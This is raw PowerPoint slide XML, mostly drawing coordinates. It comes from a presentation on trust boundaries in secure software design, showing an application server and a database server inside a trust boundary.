                  <a:close/>
                </a:path>
                <a:path w="1250315" h="149225">
                  <a:moveTo>
                    <a:pt x="1185671" y="26924"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1172999" y="28016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1174725" y="47831"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1187449" y="46736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1185671" y="26924"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1250315" h="149225">
                  <a:moveTo>
                    <a:pt x="1170558" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1172999" y="28016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1185671" y="26924"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1238577" y="26924"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1170558" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FF9966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7382002" y="3521963"/>
              <a:ext cx="1891030" cy="240029"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1891029" h="240029">
                  <a:moveTo>
                    <a:pt x="1813980" y="211640"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1811019" y="239649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1882291" y="212979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1826640" y="212979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1813980" y="211640"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1891029" h="240029">
                  <a:moveTo>
                    <a:pt x="1816061" y="191959"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1813980" y="211640"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1826640" y="212979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1828672" y="193294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1816061" y="191959"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1891029" h="240029">
                  <a:moveTo>
                    <a:pt x="1819020" y="163957"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1816061" y="191959"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1828672" y="193294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1826640" y="212979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1882291" y="212979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1890775" y="209804"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1819020" y="163957"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1891029" h="240029">
                  <a:moveTo>
                    <a:pt x="2031" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="19812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1813980" y="211640"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1816061" y="191959"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203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484581" y="2135587"/>
            <a:ext cx="1406794" cy="258337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12696" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C55A11"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Trust</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-45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C55A11"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Boundary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27</a:t>
            </a:fld>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="object 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7173250" y="2924433"/>
            <a:ext cx="612615" cy="228849"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="13332" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12696" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9966"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Attacks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00113" y="3757590"/>
            <a:ext cx="558654" cy="228209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1400" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>x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ploit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96636" y="3728388"/>
            <a:ext cx="3007212" cy="848139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298995" indent="-286934" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
              <a:tabLst>
                <a:tab pos="299630" algn="l"/>
              </a:tabLst>
            </a:pP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All</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799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5" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>systems</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="-3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inside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are</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799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trusted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  <a:p>
            <a:pPr marL="298995" indent="-286934" defTabSz="914126">
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
              <a:tabLst>
                <a:tab pos="299630" algn="l"/>
              </a:tabLst>
            </a:pP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All</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799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software</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799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inside is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 trusted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  <a:p>
            <a:pPr marL="298995" indent="-286934" defTabSz="914126">
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
              <a:tabLst>
                <a:tab pos="299630" algn="l"/>
              </a:tabLst>
            </a:pP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All</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="-15" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> data</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799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inside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is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trusted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39555" y="4825763"/>
            <a:ext cx="3987396" cy="848139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298995" marR="5078" indent="-286934" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="298995" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1799" spc="50" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="006FC0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>–	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="006FC0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="-30" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="006FC0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Trust</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799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srgbClr val="006FC0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Boundary</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="006FC0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> only</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799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srgbClr val="006FC0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>exists</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799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srgbClr val="006FC0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799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srgbClr val="006FC0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799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799" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="006FC0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>system</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799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srgbClr val="006FC0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>is designed</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="006FC0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="006FC0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>implemented</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799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srgbClr val="006FC0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="-3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799" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="006FC0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>create</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799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srgbClr val="006FC0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799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srgbClr val="006FC0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>protect</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799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srgbClr val="006FC0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>it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4701399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5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5" dirty="0"/>
              <a:t>Establish</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-55" dirty="0"/>
              <a:t>Trust</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="50" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Boundaries</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="45" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="25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32268"/>
            <a:ext cx="10201158" cy="720537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5078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Trust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Boundaries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serve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 important purpose in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 SDL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by providing a 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vehicle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answering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many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questions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about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application.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51279" y="2059027"/>
            <a:ext cx="2776767" cy="3631254"/>
            <a:chOff x="7653273" y="2058670"/>
            <a:chExt cx="2777490" cy="3632200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="object 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7659623" y="2065020"/>
              <a:ext cx="2764790" cy="3619500"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2764790" h="3619500">
                  <a:moveTo>
                    <a:pt x="0" y="460755"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2378" y="413639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9359" y="367886"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20711" y="323726"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36202" y="281392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55602" y="241114"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78679" y="203125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="105201" y="167655"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="134937" y="134937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="167655" y="105201"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203125" y="78679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241114" y="55602"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="281392" y="36202"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="323726" y="20711"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="367886" y="9359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="413639" y="2378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="460756" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2303780" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2350896" y="2378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2396649" y="9359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2440809" y="20711"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2483143" y="36202"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2523421" y="55602"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2561410" y="78679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2596880" y="105201"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2629598" y="134937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2659334" y="167655"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2685856" y="203125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2708933" y="241114"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2728333" y="281392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2743824" y="323726"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2755176" y="367886"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2762157" y="413639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2764536" y="460755"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2764536" y="3158743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2762157" y="3205860"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2755176" y="3251613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2743824" y="3295773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2728333" y="3338107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2708933" y="3378385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2685856" y="3416374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2659334" y="3451844"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2629598" y="3484562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2596880" y="3514298"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2561410" y="3540820"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2523421" y="3563897"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2483143" y="3583297"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2440809" y="3598788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2396649" y="3610140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2350896" y="3617121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2303780" y="3619500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="460756" y="3619500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="413639" y="3617121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="367886" y="3610140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="323726" y="3598788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="281392" y="3583297"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241114" y="3563897"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203125" y="3540820"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="167655" y="3514298"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="134937" y="3484562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="105201" y="3451844"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78679" y="3416374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55602" y="3378385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36202" y="3338107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20711" y="3295773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9359" y="3251613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2378" y="3205860"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="3158743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="460755"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="12192">
              <a:solidFill>
                <a:srgbClr val="006FC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608313" y="2394966"/>
              <a:ext cx="1103630" cy="814069"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1103629" h="814069">
                  <a:moveTo>
                    <a:pt x="0" y="135636"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6912" y="92756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26164" y="55522"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55522" y="26164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92756" y="6912"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135636" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="967740" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1010619" y="6912"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1047853" y="26164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1077211" y="55522"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1096463" y="92756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1103376" y="135636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1103376" y="678180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1096463" y="721059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1077211" y="758293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1047853" y="787651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1010619" y="806903"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="967740" y="813816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135636" y="813816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92756" y="806903"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55522" y="787651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26164" y="758293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6912" y="721059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="678180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="135636"/>
                  </a:lnTo>
                  <a:close/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772398" y="2574004"/>
            <a:ext cx="772594" cy="396801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60607" marR="5078" indent="-148545" defTabSz="914126">
              <a:lnSpc>
                <a:spcPct val="107500"/>
              </a:lnSpc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App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1200" spc="-10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ati</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-10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n  Server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54001" y="5766003"/>
            <a:ext cx="1406794" cy="258337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12696" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C55A11"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Trust</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-45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C55A11"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Boundary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591470" y="3227756"/>
            <a:ext cx="2257472" cy="2381900"/>
            <a:chOff x="8593708" y="3227704"/>
            <a:chExt cx="2258060" cy="2382520"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="object 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10449305" y="5135117"/>
              <a:ext cx="402590" cy="475615"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="402590" h="475614">
                  <a:moveTo>
                    <a:pt x="66992" y="57217"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="44766" y="75879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="380110" y="475043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="402208" y="456425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66992" y="57217"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="402590" h="475614">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="22605" y="94487"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44766" y="75879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35432" y="64769"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57657" y="46100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80230" y="46100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89153" y="38607"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="402590" h="475614">
                  <a:moveTo>
                    <a:pt x="57657" y="46100"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="35432" y="64769"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44766" y="75879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66992" y="57217"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57657" y="46100"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="402590" h="475614">
                  <a:moveTo>
                    <a:pt x="80230" y="46100"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="57657" y="46100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66992" y="57217"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80230" y="4610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8608313" y="3242309"/>
              <a:ext cx="1103630" cy="814069"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1103629" h="814070">
                  <a:moveTo>
                    <a:pt x="0" y="135636"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6912" y="92756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26164" y="55522"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55522" y="26164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92756" y="6912"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135636" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="967740" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1010619" y="6912"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1047853" y="26164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1077211" y="55522"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1096463" y="92756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1103376" y="135636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1103376" y="678180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1096463" y="721059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1077211" y="758293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1047853" y="787651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1010619" y="806903"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="967740" y="813816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135636" y="813816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92756" y="806903"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55522" y="787651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26164" y="758293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6912" y="721059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="678180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="135636"/>
                  </a:lnTo>
                  <a:close/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818107" y="3420746"/>
            <a:ext cx="681178" cy="396801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14901" marR="5078" indent="-102839" defTabSz="914126">
              <a:lnSpc>
                <a:spcPct val="107700"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef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at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ba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se  Server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606072" y="4089481"/>
            <a:ext cx="1103343" cy="813857"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1103629" h="814070">
                <a:moveTo>
                  <a:pt x="0" y="135636"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6912" y="92756"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26164" y="55522"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55522" y="26164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="92756" y="6912"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="135636" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="967740" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1010619" y="6912"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1047853" y="26164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1077211" y="55522"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1096463" y="92756"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1103376" y="135636"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1103376" y="678180"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1096463" y="721059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1077211" y="758293"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1047853" y="787651"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1010619" y="806903"/>
                </a:lnTo>
                <a:lnTo>
